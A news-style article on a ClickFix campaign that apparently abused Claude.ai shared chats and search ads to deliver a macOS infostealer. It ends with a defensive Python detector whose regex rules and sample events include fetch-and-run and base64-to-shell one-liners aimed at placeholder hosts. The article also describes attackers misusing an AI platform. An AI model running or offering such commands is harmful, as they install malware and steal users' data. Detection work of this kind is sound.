Cybersecurity experts have identified a growing trend where hackers are leveraging reputable AI platforms to conduct advanced social engineering attacks. Recent findings reveal that cybercriminals have been exploiting Claude.ai’s shared chat feature to host harmful ClickFix instructions.
Evolution of ClickFix Tactics
Research by TrendAI found that attackers used 106 unique malicious hostnames across six campaign waves over seven weeks. By continuously changing their infrastructure and employing a variety of AI-themed tactics, they aimed to improve the success rate of their campaigns.
This operation signifies a shift in ClickFix strategies, moving away from conventional malicious hosting to using trusted platforms like Claude.ai. Initially, the campaign utilized GitLab Pages with over 90 malicious subdomains impersonating popular AI developer tools such as Claude AI and ChatGPT Codex.
Manipulating Trusted Platforms
Hackers used Google Ads to lure technically skilled individuals searching for these AI tools. By doing so, they increased the chances of interaction from users who might be inclined to execute the suggested commands.
Victims were deceived into manually running harmful commands under the guise of software installation or repair. This method bypasses traditional security measures, as users unknowingly execute the payload themselves.
Geographical Targeting and Response
The campaign saw a significant escalation in May 2026 when attackers exploited Claude.ai’s shared chat feature. Malicious ads redirected users to legitimate Claude.ai URLs, avoiding common security warnings and protections.
Trend Micro’s analysis revealed that the payload included the MacSync infostealer, which targets macOS systems and collects sensitive data. The campaign mainly targeted the Asia-Pacific region, with Taiwan accounting for over 30% of traffic, followed by Japan and Singapore.
In response to these threats, Anthropic has banned malicious accounts and removed harmful shared chats from Claude.ai, implementing further measures to prevent future abuse.
Preventive Measures and Future Outlook
Security analysts warn of a broader trend in which legitimate platforms are weaponized for malicious purposes. As AI tools become integral to developer workflows, such abuse is expected to rise.
Organizations are advised to educate their users about the risks of ClickFix-style attacks, monitor unusual command execution, and deploy robust endpoint detection solutions. Users should exercise caution when installing software from search ads, verify URLs, and avoid executing commands from untrusted sources.
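As an added illustration of the advice to monitor unusual command execution (this is not code from the researchers or from Anthropic), the Python example below flags download-and-run command lines launched from an interactive terminal. The rule patterns, parent-process names, allowlisted host and sample events are assumptions constructed for the example.

```python
import re
from urllib.parse import urlparse

# Assumed heuristics (not from the article) for paste-and-run command shapes.
SHELL = r"(?:(?:ba|z|da)?sh|osascript|python3?)\b"
RULES = {
    "download_piped_to_interpreter":
        re.compile(rf"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sudo\s+)?{SHELL}"),
    "base64_decoded_to_interpreter":
        re.compile(rf"\bbase64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:sudo\s+)?{SHELL}"),
    "interpreter_runs_downloaded_text":
        re.compile(r"\b(?:ba|z)?sh\s+-c\s+[\"']?\$\(\s*(?:curl|wget)\b"),
}
URL = re.compile(r"https?://[^\s\"')]+")
INTERACTIVE_PARENTS = {"Terminal", "iTerm2"}   # assumed parent process names
REVIEWED_HOSTS = {"downloads.corp.example"}    # hypothetical allowlist

def classify(cmdline):
    """Return the names of every rule the command line matches."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def triage(events):
    """Return alerts for risky commands typed or pasted into a terminal."""
    alerts = []
    for ev in events:
        hits = classify(ev["cmdline"])
        if not hits or ev["parent"] not in INTERACTIVE_PARENTS:
            continue
        hosts = {urlparse(u).hostname or "" for u in URL.findall(ev["cmdline"])}
        if hosts and hosts <= REVIEWED_HOSTS:
            continue  # every URL points at a reviewed host
        alerts.append({"user": ev["user"], "rules": hits, "hosts": sorted(hosts)})
    return alerts

# Constructed sample events; hosts use reserved .example/.invalid names.
SAMPLE_EVENTS = [
    {"user": "alice", "parent": "Terminal",
     "cmdline": "curl -fsSL https://ai-tool-setup.invalid/install.sh | bash"},
    {"user": "bob", "parent": "iTerm2",
     "cmdline": "echo ZWNobyBoZWxsbw== | base64 -D | zsh"},
    {"user": "carol", "parent": "Terminal",
     "cmdline": '/bin/bash -c "$(curl -fsSL https://downloads.corp.example/bootstrap.sh)"'},
    {"user": "mdm", "parent": "launchd",
     "cmdline": "curl -s https://downloads.corp.example/agent.sh | sh"},
    {"user": "dave", "parent": "Terminal",
     "cmdline": "curl -O https://files.example/report.pdf"},
]

if __name__ == "__main__":
    print(*triage(SAMPLE_EVENTS), sep="\n")
```

Legitimate installers use the same `bash -c "$(curl ...)"` idiom, which is why the example pairs the pattern match with a parent-process check and a host allowlist instead of alerting on the pattern alone.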
Staying informed and vigilant is crucial as the landscape of cyber threats continues to evolve.
